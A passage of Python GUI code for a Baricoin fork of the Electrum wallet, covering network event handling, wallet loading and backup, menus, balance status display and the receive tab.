self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum"
if constants.net.TESTNET:
name += " " + constants.net.NET_NAME.capitalize()
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Baricoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Baricoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Baricoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return False
backup_dir = self.config.get_backup_dir()
if backup_dir is None:
self.show_message(_("You need to configure a backup directory in your preferences"), title=_("Backup not configured"))
return
try:
new_path = self.wallet.save_backup(backup_dir)
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
return
msg = _("A copy of your wallet file was created in")+" '%s'" % str(new_path)
self.show_message(msg, title=_("Wallet backup created"))
return True
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save backup"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.export_invoices())
requests_menu = wallet_menu.addMenu(_("Requests"))
requests_menu.addAction(_("Import"), lambda: self.import_requests())
requests_menu.addAction(_("Export"), lambda: self.export_requests())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
# add_toggle_action(view_menu, self.channels_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools")) # type: QMenu
preferences_action = tools_menu.addAction(_("Preferences"), self.settings_dialog) # type: QAction
if sys.platform == 'darwin':
# "Settings"/"Preferences" are all reserved keywords in macOS.
# preferences_action will get picked up based on name (and put into a standardized location,
# and given a standard reserved hotkey)
# Hence, this menu item will be at a "uniform location re macOS processes"
preferences_action.setMenuRole(QAction.PreferencesRole) # make sure OS recognizes it as preferences
# Add another preferences item, to also have a "uniform location for Electrum between different OSes"
tools_menu.addAction(_("Electrum preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), self.gui_object.show_network_dialog).setEnabled(bool(self.network))
if self.network and self.network.local_watchtower:
tools_menu.addAction(_("Local &Watchtower"), self.gui_object.show_watchtower_dialog)
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates"), self.show_update_check)
help_menu.addAction(_("&Official website"), lambda: webopen("https://github.com/asuka431/baricoin"))
help_menu.addSeparator()
help_menu.addAction(_("&Documentation"), lambda: webopen("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters().server.host
self.pay_to_URI('baricoin:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum",
(_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" +
_("Electrum's focus is speed, with low resource usage and simplifying Baricoin.") + " " +
_("You do not need to perform regular backups, because your wallet can be "
"recovered from a secret phrase that you can memorize or write on paper.") + " " +
_("Startup times are instant because it operates in conjunction with high-performance "
"servers that handle the most complicated parts of the Baricoin system.") + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_bitcoin_paper(self):
filename = os.path.join(self.config.path, 'bitcoin.pdf')
if not os.path.exists(filename):
s = self._fetch_tx_from_network("54e48e5f5c656b26c3bca14a8c95aa583d07ebe84dde3b7dd4a78f4e4186e713")
if not s:
return
s = s.split("0100000000000000")[1:-1]
out = ''.join(x[6:136] + x[138:268] + x[270:400] if len(x) > 136 else x[6:] for x in s)[16:-20]
with open(filename, 'wb') as f:
f.write(bytes.fromhex(out))
webopen('file:///' + filename)
def show_update_check(self, version=None):
self.gui_object._update_check = UpdateCheck(latest_version=version)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
f'''<a href="{constants.GIT_REPO_ISSUES_URL}">{constants.GIT_REPO_ISSUES_URL}</a><br/><br/>''',
_("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True)
def notify_transactions(self):
if self.tx_notification_queue.qsize() == 0:
return
if not self.wallet.up_to_date:
return # no notifications while syncing
now = time.time()
rate_limit = 20 # seconds
if self.tx_notification_last_time + rate_limit > now:
return
self.tx_notification_last_time = now
self.logger.info("Notifying GUI about new transactions")
txns = []
while True:
try:
txns.append(self.tx_notification_queue.get_nowait())
except queue.Empty:
break
# Combine the transactions if there are at least three
if len(txns) >= 3:
total_amount = 0
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
total_amount += tx_wallet_delta.delta
self.notify(_("{} new transactions: Total amount received in the new transactions {}")
.format(len(txns), self.format_amount_and_units(total_amount)))
else:
for tx in txns:
tx_wallet_delta = self.wallet.get_wallet_delta(tx)
if not tx_wallet_delta.is_relevant:
continue
self.notify(_("New transaction: {}").format(self.format_amount_and_units(tx_wallet_delta.delta)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000)
def timer_actions(self):
self.request_list.refresh_status()
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
elif not self.wallet.up_to_date:
# this updates "synchronizing" progress
self.update_status()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
self.notify_transactions()
def format_amount(self, amount_sat, is_diff=False, whitespaces=False) -> str:
"""Formats amount as string, converting to desired unit.
E.g. 500_000 -> '0.005'
"""
return self.config.format_amount(amount_sat, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount_sat, *, timestamp: int = None) -> str:
"""Returns string with both baricoin and fiat amounts, in desired units.
E.g. 500_000 -> '0.005 BARI (191.42 EUR)'
"""
text = self.config.format_amount_and_units(amount_sat)
fiat = self.fx.format_amount_and_units(amount_sat, timestamp=timestamp) if self.fx else None
if text and fiat:
text += f' ({fiat})'
return text
def format_fiat_and_units(self, amount_sat) -> str:
"""Returns string of FX fiat amount, in desired units.
E.g. 500_000 -> '191.42 EUR'
"""
return self.fx.format_amount_and_units(amount_sat) if self.fx else ''
def format_fee_rate(self, fee_rate):
return self.config.format_fee_rate(fee_rate)
def get_decimal_point(self):
return self.config.get_decimal_point()
def base_unit(self):
return self.config.get_base_unit()
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None:
text = _("Offline")
icon = read_QIcon("status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
fork_str = "_fork" if len(self.network.get_blockchains())>1 else ""
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
text = ("{} ({}/{})"
.format(_("Synchronizing..."), num_answered, num_sent))
icon = read_QIcon("status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = read_QIcon("status_lagging%s.png"%fork_str)
else:
c, u, x = self.wallet.get_balance()
text = _("Balance") + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip())
if self.wallet.has_lightning():
l = self.wallet.lnworker.get_balance()
text += u' \U000026a1 %s'%(self.format_amount_and_units(l).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
if self.tray:
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
self.status_button.setIcon(icon)
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return tab
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ''.join([
_('Expiration date of your request.'), ' ',
_('This information is seen by the recipient if you send them a signed payment request.'),
'\n\n',
_('For on-chain requests, the address gets reserved until expiration. After that, it might get reused.'), ' ',
_('The baricoin address never expires and will always be part of this electrum wallet.'), ' ',
_('You can reuse a baricoin address any number of times but it is not good for your privacy.'),
])
grid.addWidget(HelpLabel(_('Expires after') + ' (?)', msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('New Address'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('New Address'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Receive queue'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning: bool):
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
if is_lightning:
if not self.wallet.lnworker.channels:
self.show_error(_("You need to open a Lightning channel first."))
return
# TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy)
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
except InvoiceError as e:
self.show_error(_('Error creating payment request') + ':\n' + str(e))
return
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount: int, message: str, expiration: int) -> Optional[str]:
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
